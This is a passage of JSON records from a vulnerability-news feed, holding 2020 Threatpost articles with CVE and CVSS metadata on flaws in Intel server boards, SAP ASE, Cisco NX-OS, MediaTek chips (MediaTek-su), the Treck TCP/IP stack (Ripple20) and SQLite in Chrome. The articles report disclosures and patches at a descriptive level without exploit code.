"CVE-2020-7082", "CVE-2020-7083", "CVE-2020-7084", "CVE-2020-7085"], "modified": "2020-04-22T14:35:22", "id": "THREATPOST:7BA8370AF04822DCF1A03C685AF16604", "href": "https://threatpost.com/microsoft-issues-out-of-band-security-update-for-office-paint-3d/155016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:15:27", "description": "Intel is warning of a rare critical-severity vulnerability affecting several of its motherboards, server systems and compute modules. The flaw could allow an unauthenticated, remote attacker to achieve escalated privileges.\n\nThe recently patched flaw ([CVE-2020-8708](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8708>)) ranks 9.6 out of 10 on the CVSS scale, making it critical. Dmytro Oleksiuk, who discovered the flaw, told Threatpost that it exists in the firmware of Emulex Pilot 3. This baseboard-management controller is a service processor that monitors the physical state of a computer, network server or other hardware devices via specialized sensors.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\nClick to register!\n\nEmulex Pilot 3 is used by various motherboards, which aggregate all the server components into one system. Also impacted are various server operating systems, and some Intel compute modules, which are electronic circuits, packaged onto a circuit board, that provide various functions.\n\nThe critical flaw stems from improper-authentication mechanisms in these Intel products before version 1.59.\n\nIn bypassing authentication, an attacker would be able to access to the KVM console of the server. The KVM console can access the system consoles of network devices to monitor and control their functionality. The KVM console is like a remote desktop implemented in the baseboard management controller \u2013 it provides an access point to the display, keyboard and mouse of the remote server, Oleksiuk told Threatpost.\n\nThe flaw is dangerous as it\u2019s remotely exploitable, and attackers don\u2019t need to be authenticated to exploit it \u2013 though they need to be located in the same network segment as the vulnerable server, Oleksiuk told Threatpost.\n\n\u201cThe exploit is quite simple and very reliable because it\u2019s a design flaw,\u201d Oleksiuk told Threatpost.\n\nBeyond this critical flaw, Intel also fixed bugs tied to 22 critical-, high-, medium- and low-severity CVEs affecting its server board, systems and compute modules. Other high-severity flaws include a heap-based overflow ([CVE-2020-8730](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8730>)) that\u2019s exploitable as an authenticated user; incorrect execution-assigned permissions in the file system ([CVE-2020-8731](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8731>)); and a buffer overflow in daemon ([CVE-2020-8707](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8707>)) \u2014 all three of which enable escalated privileges.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/11153612/intel-flaw.png>)\n\nClick to enlarge.\n\nOleksiuk was credited with reporting CVE-2020-8708, as well as CVE-2020-8706, CVE-2020-8707. All other CVEs were found internally by Intel.\n\nAffected server systems include: The R1000WT and R2000WT families, R1000SP, LSVRP and LR1304SP families and R1000WF and R2000WF families.\n\nImpacted motherboards include: The S2600WT family, S2600CW family, S2600KP family, S2600TP family, S1200SP family, S2600WF family, S2600ST family and S2600BP family.\n\nFinally, impacted compute modules include: The HNS2600KP family, HNS2600TP family and HNS2600BP family. More information regarding patches is available in [Intel\u2019s security advisory](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00384.html>).\n\nIntel also issued an [array of other security advisories](<https://www.intel.com/content/www/us/en/security-center/default.html>) addressing high-severity flaws across its product lines, including ones that affect [Intel Graphics Drivers](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00369.html>), Intel\u2019s [RAID web console](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00378.html>) 3 for Windows, [Intel Server Board M10JNP2SB](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00386.html>) and [Intel NUCs](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00392.html>).\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-08-11T20:02:22", "type": "threatpost", "title": "Critical Intel Flaw Afflicts Several Motherboards, Server Systems, Compute Modules", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135", "CVE-2020-8706", "CVE-2020-8707", "CVE-2020-8708", "CVE-2020-8730", "CVE-2020-8731"], "modified": "2020-08-11T20:02:22", "id": "THREATPOST:8A8E859062970130E3F91D160F03325C", "href": "https://threatpost.com/critical-intel-flaw-motherboards-server-compute-modules/158270/", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:18:58", "description": "Researchers are urging users to apply patches for several critical vulnerabilities in SAP\u2019s Adaptive Server Enterprise (ASE). If exploited, the most severe flaws could give unprivileged users complete control of databases and \u2013 in some cases \u2013 even underlying operating systems.\n\nASE (previously known as Sybase SQL server) is SAP\u2019s popular database management software, targeted for transactional-based applications. ASE is used by more than 30,000 organizations globally \u2013 including 90 percent of the top banks and security firms worldwide, [according to SAP. ](<https://news.sap.com/2019/11/sap-ase-sap-iq-next-generation/>)\n\nResearchers disclosed six vulnerabilities that they discovered while conducting security tests for the latest version of the software, ASE 16 (SP03 PL08). While SAP has released patches for both [ASE 15.7 and 16.0 in its May 2020 update,](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=545396222>) researchers disclosed technical details of the flaws on Wednesday, saying \u201cthere is no question\u201d that the patches should be applied immediately if they haven\u2019t been already.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cFor the last several years there have been relatively few security patches for SAP Adaptive Server Enterprise (ASE),\u201d said Trustwave researchers [in a Wednesday analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/system-takeover-through-new-sap-ase-vulnerabilities/>). \u201cNew security research conducted by Trustwave revealed a bunch of vulnerabilities in the current version of SAP\u2019s flagship relational database product. Historically, SAP ASE is widely used by the financial sector in the US and other countries.\u201d\n\nThe most severe vulnerability, [CVE-2020-6248](<https://www.google.com/search?client=safari&rls=en&q=CVE-2020-6248&ie=UTF-8&oe=UTF-8>), has a CVSS score of 9.1 out of 10. The flaw stems from a lack of security checks for overwriting critical configuration files during database backup operations. That means any unprivileged user who can run a DUMP command (used by database owners to back up the file system to storage devices) can send a corrupted configuration file, resulting in potential takeover of the database. This file will then be detected by the server and replaced with a default configuration \u2013 which allows anyone to connect to the Backup Server using the login and an empty password.\n\n\u201cThe next step would be to change the sybmultbuf_binary Backup Server setting to point to an executable of the attacker\u2019s choice,\u201d said researchers. \u201cSubsequent DUMP commands will now trigger the execution of the attacker\u2019s executable. If SAP ASE is running on Windows, the code will run as LocalSystem by default.\u201d\n\nAnother critical flaw ([CVE-2020-6252](<https://nvd.nist.gov/vuln/detail/CVE-2020-6252>)) was discovered affecting Windows installations of the SAP ASE 16. That bug exists in a small helper database (SQL Anywhere) used by the SAP ASE installation to manage database creation and version management. Specifically, the issue is in the Cockpit component of ASE, which is a web-based tool for monitoring the status and availability of SAP ASE servers. The issues stems from the password, used to login in to the helper database, being in a configuration file that is readable by any Windows user.\n\n\u201cThis means any valid Windows user can grab the file and recover the password to login to the helper SQL Anywhere database as the special user utility_db and then issue commands like CREATE ENCRYPTED FILE to overwrite operating system files (remember, the helper database runs as LocalSystem by default!) and possibly cause code execution with LocalSystem privileges,\u201d said researchers.\n\nIn another issue, researchers found clear text passwords in the ASE server installation logs: \u201cThe logs are only readable to the SAP account, but will completely compromise the SAP ASE when joined with some other issue that allows filesystem access,\u201d they said.\n\nResearchers also found two SQL injection flaws that could be abused to allow privilege escalation. One ([CVE-2020-6241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6241>)) exists in global temporary tables in ASE 16, while the other ([CVE-2020-6253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6253>)) stems from the WebServices handling code of ASE.\n\nThe final bug discovered was an XP Server flaw ([CVE-2020-6243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6243>)) that could allow authenticated Windows users to gain arbitrary code execution (as LocalSystem) if they can connect to the SAP ASE.\n\n\u201cOrganizations often store their most critical data in databases, which, in turn, are often necessarily exposed in untrusted or publicly exposed environments,\u201d said researchers. \u201cThis makes vulnerabilities like these essential to address and test quickly since they not only threaten the data in the database but potentially the full host that it is running on.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-06-03T16:51:39", "type": "threatpost", "title": "Critical SAP ASE Flaws Allow Complete Control of Databases", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135", "CVE-2020-6241", "CVE-2020-6243", "CVE-2020-6248", "CVE-2020-6252", "CVE-2020-6253"], "modified": "2020-06-03T16:51:39", "id": "THREATPOST:60965118E4D29480FABA6D1722EFA4AA", "href": "https://threatpost.com/critical-sap-ase-flaws-complete-control-databases/156239/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:20:49", "description": "Cisco Systems disclosed eight high-severity bugs impacting a range of its networking gear, including its switches and fiber storage solutions. Cisco\u2019s NX-OS was hardest hit, with six security alerts tied to the network operating system that underpins the networking giant\u2019s Nexus-series Ethernet switches and MDS-series Fibre Channel storage area network switches.\n\nPatches are available for all vulnerabilities, according to a [Cisco Security Advisory](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>) posted on Wednesday. In addition to the eight patched high-severity bugs, Cisco also fixed a flaw (CVE-2020-3504) listed as [medium severity](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucs-cli-dos-GQUxCnTe>) that impacts the Cisco Unified Computing System management software.\n\nHigh-severity vulnerabilities impacting Cisco\u2019s NX-OS software include CVEs tracked as [CVE-2020-3397](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxosbgp-nlri-dos-458rG2OQ>), [CVE-2020-3398](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxosbgp-mvpn-dos-K8kbCrJp>), [CVE-2020-3338](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-pim-memleak-dos-tC8eP7uw>), [CVE-2020-3415](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-dme-rce-cbE3nhZS>), [CVE-2020-3517](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fxos-nxos-cfs-dos-dAmnymbd>) and [CVE-2020-3454](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-callhome-cmdinj-zkxzSCY>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nTwo bugs ([CVE-2020-3397](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxosbgp-nlri-dos-458rG2OQ>) and [CVE-2020-3398](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxosbgp-mvpn-dos-K8kbCrJp>)) are \u201cCisco NX-OS software Border Gateway Protocol Multicast VPN denial of service vulnerabilities,\u201d according to the security bulletin. Both vulnerabilities allow an attacker to launch either a partial or prolonged DoS attack via session resets and device reloading.\n\n\u201cThe vulnerability is due to incomplete input validation of a specific type of BGP MVPN update message. An attacker could exploit this vulnerability by sending this specific, valid BGP MVPN update message to a targeted device,\u201d wrote Cisco regarding CVE-2020-3397. The other VPN bug is due to incorrect parsing of a specific type of BGP MVPN update message.\n\nCisco also reported a bug ([CVE-2020-3338](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-pim-memleak-dos-tC8eP7uw>)) in the context of its NX-OS software underlying its IPv6 Protocol Independent Multicast (PIM). \u201cPIMs are used between switches so that they can track which multicast packets to forward to each other and to their directly connected LANs,\u201d according to Cisco.\n\nThe vulnerability allows an unauthenticated, remote attacker to cause a denial-of-service (DoS) condition on an affected device, Cisco said. Vulnerable are Nexus 3000 Series Switches (CSCvr91853), Nexus 7000 Series Switches (CSCvr97684) and Nexus 9000 Series Switches in standalone NX-OS mode (CSCvr91853).\n\nOne of the more interesting of the patched bugs is the NX-OS software Call Home command injection bug could allow an authenticated, remote attacker to inject arbitrary commands that could be executed with root privileges on the underlying operating system.\n\n\u201cThe vulnerability is due to insufficient input validation of specific Call Home configuration parameters when the software is configured for transport method HTTP. An attacker could exploit this vulnerability by modifying parameters within the Call Home configuration on an affected device,\u201d Cisco warned.\n\nImpacted are nine Cisco switches ranging from MDS 9000 Series Multilayer Switches to the Nexus 9500 R-Series Switching Platform.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. [Resister today](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) for this **FREE **Threatpost webinar \u201c**[Five Essentials for Running a Successful Bug Bounty Program](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)**\u201c.** **Hear from top **Bug Bounty Program experts** how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. **Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) webinar.**\n", "cvss3": {}, "published": "2020-08-26T20:03:48", "type": "threatpost", "title": "Cisco Patches 'High-Severity' Bugs Impacting Switches, Fibre Storage", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3338", "CVE-2020-3397", "CVE-2020-3398", "CVE-2020-3415", "CVE-2020-3454", "CVE-2020-3504", "CVE-2020-3517", "CVE-2020-5135"], "modified": "2020-08-26T20:03:48", "id": "THREATPOST:C4D1E87CE4261EC62077E4F157643132", "href": "https://threatpost.com/cisco-high-severity-bugs-impact-switches-fibre-storage/158691/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:23:26", "description": "Google has addressed a high-severity flaw in MediaTek\u2019s Command Queue driver that developers said affects millions of devices \u2013 and which has an exploit already circulating in the wild.\n\nAlso in its March 2020 Android Security bulletin, [issued this week](<https://source.android.com/security/bulletin/2020-03-01>), Google disclosed and patched a critical security vulnerability in the Android media framework, which could enable remote code execution within the context of a privileged process.\n\nThe critical bug (CVE-2020-0032) can be exploited with a specially crafted file, according to the advisory. Other details were scant, but Google noted that it\u2019s the most concerning vulnerability out of the entirety of the March update.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe MediaTek bug meanwhile is an elevation-of-privilege flaw (CVE-2020-0069) discovered by members of XDA-Developers (a forum for Android software modifications) \u2014 they said the bug is more specifically a root-access issue. Even though the March update is the bug\u2019s first public disclosure, XDA members said [in a posting this week](<https://www.xda-developers.com/mediatek-su-rootkit-exploit/>) that an exploit for it has been floating around since April last year. And, they said that it is now being actively used by cybercriminals in campaigns.\n\n\u201cDespite MediaTek making a patch available a month after discovery, the vulnerability is still exploitable on dozens of device models,\u201d according to the alert. \u201cNow MediaTek has turned to Google to close this patch gap and secure millions of devices against this critical security exploit.\u201d\n\nAn XDA community member who goes by \u201cdiplomatic\u201d was looking to gain root access to Amazon Fire tablets, which runs on the Android OS, in order to get rid of what developers said is \u201cuninstallable bloatware\u201d on the devices. Amazon has locked the environment down to keep users within its walled garden, according to the developers.\n\n\u201cThe only way to root an Amazon Fire tablet (without hardware modifications) is to find an exploit in the software that allows the user to bypass Android\u2019s security model,\u201d according to the post. \u201cIn February of 2019, that\u2019s exactly what XDA Senior Member diplomatic did when he published a thread on our Amazon Fire tablet forums. He quickly realized that this exploit was far wider in scope than just Amazon\u2019s Fire tablets.\u201d\n\nIn fact, the exploit works on \u201cvirtually all of MediaTek\u2019s 64-bit chips,\u201d developers said, translating to millions of devices.\n\ndiplomatic\u2019s exploit is a script, dubbed \u201cMediaTek-su\u201d that grants users superuser access in shell. It also sets SELinux (the Linux kernel module that provides access control for processes), to the \u201chighly insecure \u201cpermissive\u201d state,\u201d according to the post.\n\n\u201cFor a user to get root access and set SELinux to permissive on their own device is shockingly easy to do: All you have to do is copy the script to a temporary folder, change directories to where the script is stored, add executable permissions to the script, and then execute the script,\u201d XDA members explained.\n\nAfter discovering the script and how dangerous it can be in February, the forum notified Google of the bug, members said. XDA noted that in January, Trend Micro [found three malicious spyware apps](<https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/>) in the Google Play Store, linked to the APT known as SideWinder. The analysis mentions in passing that the apps were using MediaTek-su to gain root access on Pixel devices \u2013 though XDA pointed out that researchers there likely didn\u2019t realize that MediaTek-su was an unpatched exploit and didn\u2019t think to notify vendors.\n\nThe consequences of a successful attack can be significant: With root access, any app can grant itself any permission it wants; and with a root shell, all files on the device, even those stored in private data directories of applications, are accessible.\n\n\u201cAn app with root can also silently install any other app it wants in the background and then grant them whatever permissions they need to violate your privacy,\u201d according to XDA members. \u201cAccording to XDA Recognized Developer topjohnwu, a malicious app can even \u2018inject code directly into Zygote by using ptrace,\u2019 which means a normal app on your device could be hijacked to do the bidding of the attacker.\u201d\n\nAlso in its March Android update, Google also patched a slew of other high-severity bugs and a handful of moderate flaws, across various components. In the media framework, Google addressed a high-severity elevation-of-privilege bug (CVE-2020-0033) and a high-severity information-disclosure issue (CVE-2020-0034) for instance. Other components with patches include the Android system, the Android framework, the Google Play system, the kernel and flexible printed circuits (FPC). It also issued advisories for high-severity bugs in third-party components, including from Qualcomm and the aforementioned MediaTek bug.\n\nAndroid partners and OEMs were notified of the issues at least a month before publication of the March update in order to give them time to issue patches, as [Samsung has done](<https://security.samsungmobile.com/securityUpdate.smsb>) as well as [Qualcomm](<https://www.qualcomm.com/company/product-security/bulletins/march-2020-bulletin>). Source code patches for the issues were also released to the Android Open Source Project (AOSP) repository, according to the advisory.While the patch is now available, XDA members pointed out that MediaTek chipsets are found in dozens of budget and mid-tier Android devices from many different vendors, so the patching process is likely to take a while.\n", "cvss3": {}, "published": "2020-03-03T19:02:22", "type": "threatpost", "title": "MediaTek Bug Actively Exploited, Affects Millions of Android Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2215", "CVE-2020-0032", "CVE-2020-0033", "CVE-2020-0034", "CVE-2020-0069", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-03T19:02:22", "id": "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "href": "https://threatpost.com/mediatek-bug-actively-exploited-android/153408/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:18:16", "description": "A series of 19 different vulnerabilities, four of them critical, are affecting hundreds of millions of internet of things (IoT) and industrial-control devices.\n\nThe issue is based in the supply chain and code reuse, with the bugs affecting a TCP/IP software library developed by Treck that many manufacturers use. Researchers at JSOF uncovered the faulty part of Treck\u2019s code, which is built to handle the ubiquitous TCP-IP protocol that connects devices to networks and the internet, in the devices of more than 10 different manufacturers\u2014and it\u2019s likely present in dozens more.\n\nAffected hardware includes everything from connected printers to medical infusion pumps and industrial-control gear, according to researchers at JSOF\u2019s research lab. Treck users include \u201cone-person boutique shops to Fortune 500 multinational corporations, including HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, Baxter, as well as many other major international vendors suspected of being of vulnerable in medical, transportation, industrial control, enterprise, energy (oil/gas), telecom, retail and commerce, and other industries,\u201d according to the research.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe wide-spread dissemination of the software library (and its internal vulnerabilities) was a natural consequence of the supply chain \u2018ripple-effect,'\u201d researchers said [in a posting](<https://www.jsof-tech.com/ripple20/#ripple-whitepaper>) on Tuesday. \u201cA single vulnerable component, though it may be relatively small in and of itself, can ripple outward to impact a wide range of industries, applications, companies and people.\u201d\n\nThe flaws, dubbed Ripple20, include four remote code-execution vulnerabilities. If properly exploited, data could be stolen off of a printer, a medical device\u2019s behavior could be tampered with, or industrial control devices could be made to malfunction.\n\n\u201cAn attacker could hide malicious code within embedded devices for years. One of the vulnerabilities could enable entry from outside into the network boundaries; and this is only a small taste of the potential risks,\u201d according to JSOF.\n\n## **Vulnerability Details**\n\nThe Ripple20 bugs include four critical flaws. These include CVE-2020-11896, with a base score of 10 out of 10 on the CVSS severity scale, which can be triggered by sending multiple malformed IPv4 packets to a device supporting IPv4 tunneling.\n\n\u201cIt affects any device running Treck with a specific configuration,\u201d according to JSOF. \u201cIt can allow a stable remote code execution and has been demonstrated on a Digi International device. Variants of this issue can be triggered to cause a Denial of Service or a persistent Denial of Service, requiring a hard reset.\u201d\n\nThe critical bug tracked as CVE-2020-11897 meanwhile also carried a 10-out-of-10 severity, and is an out-of-bounds write flaw that can be triggered by sending multiple malformed IPv6 packets to a device. It affects any device running an older version of Treck with IPv6 support, and was previously fixed in a routine code change. It can potentially allow stable remote code execution, according to the writeup.\n\nAnother critical bug, CVE-2020-11901, ranks 9 out of 10 on the severity scale and can be triggered by answering a single DNS request made from the device. It can allow an attacker to infiltrate the network, execute code and take over the device with one vulnerability, bypassing any security measures.\n\n\u201cIt affects any device running Treck with DNS support and we have demonstrated that it can be used to perform remote code execution on a Schneider Electric APC UPS,\u201d according to JSOF. \u201cIn our opinion this is the most severe of the vulnerabilities despite having a CVSS score of 9, due to the fact that DNS requests may leave the network in which the device is located, and a sophisticated attacker may be able to use this vulnerability to take over a device from outside the network through DNS cache poisoning, or other methods.\u201d\n\nThe last critical bug is CVE-2020-11898, rating 9.1, which is an improper handling of length parameter inconsistency bug in the IPv4/ICMPv4 component, when handling a packet sent by an unauthorized network attacker. It can allow information disclosure.\n\nOther flaws range from high-severity 8.2 bugs (such as CVE-2020-11900, a use-after-free flaw) to low-severity improper input validation issues (such as CVE-2020-11913, rating only 3.7 in severity).\n\n\u201cThe other 15 vulnerabilities are in ranging degrees of severity with CVSS score ranging from 3.1 to 8.2, and effects ranging from denial of service to potential remote code execution,\u201d the firm said. \u201cMost of the vulnerabilities are true zero-days, with four of them having been closed over the years as part of routine code changes, but remained open in some of the affected devices (three lower severity, one higher). Many of the vulnerabilities have several variants due to the Stack configurability and code changes over the years.\u201d\n\nEffective exploitation can lead to a host of bad outcomes, the research firm warned, such as remote takeover of devices and lateral movement within the compromised network; broadcast attacks that can take over all impacted devices in the network simultaneously; hiding within an infected device for stealthy recon; and bypassing network address traversal (NAT) protections.\n\nJSOF will offer further details of the vulnerabilities [at the Black Hat USA virtual event](<https://threatpost.com/black-hat-usa-def-con-28-go-virtual/155606/>) in August.\n\nJonathan Knudsen, senior security strategist, Synopsys, noted that the Ripple20 disclosures illustrate endemic difficulties in software development.\n\n\u201cFirst, security must be integrated to every part of software development: From threat modeling during design to automated security testing during implementation, every phase of software development must involve security,\u201d he said via email. \u201cSecond, organizations that create software must manage their third-party components. The main reason for the far-reaching effects of the Ripple20 vulnerabilities is that they are vulnerabilities in a network component used by many organizations in many products. Each software development organization must understand the third-party components they are using to minimize the risk that they represent.\u201d\n\n## **Patches and Mitigation**\n\nTreck has issued a patch for use by OEMs in the latest Treck stack version (6.0.1.67 or higher). The challenge now is for those companies to implement it. In addition to advisories from ICS CERT, CERTCC and JPCERT/CC, [Intel](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00295.html>) and [HP](<https://support.hp.com/in-en/document/c06640149>) have also issued alerts.\n\n\u201cWhile the best response might be to install the original Treck patch, there are many situations in which installing the original patch is not possible,\u201d according to the JSOF analysis. \u201cCERTs work to develop alternative approaches that can be used to minimize or effectively eliminate the risk, even if patching is not an option.\u201d\n\nBecause it\u2019s a supply-chain issue, affected products should be able to update themselves, Knudsen added \u2013 something that\u2019s not always the norm in the IoT and industrial-control sectors.\n\n\u201cUsing secure development practices and managing third-party components will result in fewer, less frequent updates,\u201d he explained. \u201cNevertheless, something will always go wrong and updates will always be necessary. Systems and devices must be able to update themselves securely, and the manufacturer must make a commitment to maintaining the software for some clearly stated time period.\u201d\n\nBased on CERT/CC and CISA ICS-CERT advisories, if gear can\u2019t be patched, admins should minimize network exposure for embedded and critical devices, ensuring that devices are not accessible from the Internet unless absolutely essential. Also, operational technology networks and devices should be segregated behind firewalls and isolated from any business networks.\n\nUsers can also take steps to block anomalous IP traffic, employ pre-emptive traffic filtering, normalize DNS through a secure recursive server or DNS inspection firewall and/or provide DHCP/DHCPv6 security, with features such as DHCP snooping, according to the CERTs.\n\n\u201cThe software library spread far and wide, to the point that tracking it down has been a major challenge,\u201d the researchers concluded. \u201cAs we traced through the distribution trail of Treck\u2019s TCP/IP library, we discovered that over the past two decades this basic piece of networking software has been spreading around the world, through both direct and indirect use. As a dissemination vector, the complex supply chain provides the perfect channel, making it possible for the original vulnerability to infiltrate and camouflage itself almost endlessly.\u201d\n\n**_Insider threats are different in the work-from home era. On _**[**_June 24 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_, join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyer, for a FREE webinar, \u201c_**_**The Enemy Within: How Insider Threats Are Changing.\u201d **_**_Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it_**_**. **_[**_Please register here_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_ for this Threatpost webinar._**\n", "cvss3": {}, "published": "2020-06-16T16:22:09", "type": "threatpost", "title": "'Ripple20' Bugs Impact Hundreds of Millions of Connected Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11896", "CVE-2020-11897", "CVE-2020-11898", "CVE-2020-11900", "CVE-2020-11901", "CVE-2020-11913", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-16T16:22:09", "id": "THREATPOST:659B01C0432DD93535B729D005CCA9E8", "href": "https://threatpost.com/millions-connected-devices-ripple20-bugs/156599/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:26:59", "description": "Researchers have disclosed five recently-patched vulnerabilities in the Google Chrome browser that could be exploited by an attacker to remotely execute code.\n\nThe vulnerabilities, dubbed Magellan 2.0 by the Tencent Blade team of researchers who discovered them, exist in the SQLite database management system. SQLite is a lightweight, self-contained database engine utilized widely in browsers, operating systems and mobile phones.\n\nResearchers said that they were able to successfully exploit the Chrome browser leveraging the five vulnerabilities: [CVE-2019-13734](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13734>), [CVE-2019-13750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13750>),[ CVE-2019-13751](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13751>), [CVE-2019-13752](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13752>),[ CVE-2019-13753](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13753>). According to their [CVE](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13751>) [Mitre descriptions](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13751>), the vulnerabilities could be exploited remotely via a crafted HTML page to launch an array of malicious attacks \u2013 allowing attackers to do anything from \u201cbypass defense-in-depth measures\u201d to \u201cobtain potentially sensitive information from process memory.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMagellan means a group of vulnerabilities we have reported recently,\u201d said Tencent researchers in an [advisory this week](<https://blade.tencent.com/magellan2/index_en.html>). \u201cIf you are using a software that is using SQLite as component (without the latest patch), and it supports external SQL queries\u2026 Or, you are using Chrome that is prior to 79.0.3945.79 and it enabled WebSQL, you may be affected.\u201d\n\nDue to \u201cresponsible vulnerability disclosure process,\u201d researchers said they are not disclosing further details of the vulnerability \u201c90 days after the vulnerability report.\u201d\n\nThe flaw was reported to Google and SQLite on Nov. 16, 2019; on Dec. 11, 2019, Google released the official fixed Chrome version: 79.0.3945.79. Chrome/Chromium browsers prior to version 79.0.3945.79 with WebSQL enabled may be affected, researchers said.\n\n\u201cWe have reported all the details of the vulnerability to Google and they have fixed vulnerabilities,\u201d said researchers. \u201cIf your product uses Chromium, please update to the official stable version 79.0.3945.79. If your product uses SQLite, please update to the newest code commit.\u201d\n\n> No need to worry: SQLite and Google have already confirmed and fixed it and we are helping other vendors through it too. We haven't found any proof of wild abuse of 